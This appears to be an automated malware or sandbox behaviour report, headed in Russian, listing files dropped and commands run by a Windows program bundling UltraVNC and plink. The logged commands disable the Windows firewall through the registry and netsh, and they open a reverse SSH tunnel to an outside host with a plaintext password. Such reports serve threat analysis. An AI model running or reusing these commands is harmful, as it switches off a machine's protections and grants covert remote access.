Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- %TEMP%\plink.exe -batch -l vnc -pw R3v3rse-R3m0te! -R 5902:127.0.0.1:5902 -N vnc.ict4schools.nl
- %TEMP%\winvnc.exe -run
- %WINDIR%\regedit.exe /S putty-keycache.reg
- <SYSTEM32>\netsh.exe firewall set opmode disable
- <SYSTEM32>\cmd.exe /c ""%TEMP%\run.bat" "
- %TEMP%\ldapauth9x.dll
- %TEMP%\ldapauthnt4.dll
- %TEMP%\ldapauth.dll
- %TEMP%\authadmin.dll
- %TEMP%\authSSP.dll
- %TEMP%\logging.dll
- %TEMP%\workgrpdomnt4.dll
- <LS_APPDATA>\PUTTY.RND
- %TEMP%\vnchooks.dll
- %TEMP%\logmessages.dll
- %TEMP%\sas.dll
- %TEMP%\MSLogonACL.exe
- %TEMP%\plink.exe
- %TEMP%\ultravnc.ini
- %TEMP%\run.bat
- %TEMP%\putty-keycache.reg
- %TEMP%\putty.exe
- %TEMP%\uvnc_settings.exe
- %TEMP%\winvnc.exe
- %TEMP%\testauth.exe
- %TEMP%\setcad.exe
- %TEMP%\setpasswd.exe
- 'vn#.##t4schools.nl':22
- DNS ASK vn#.##t4schools.nl
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''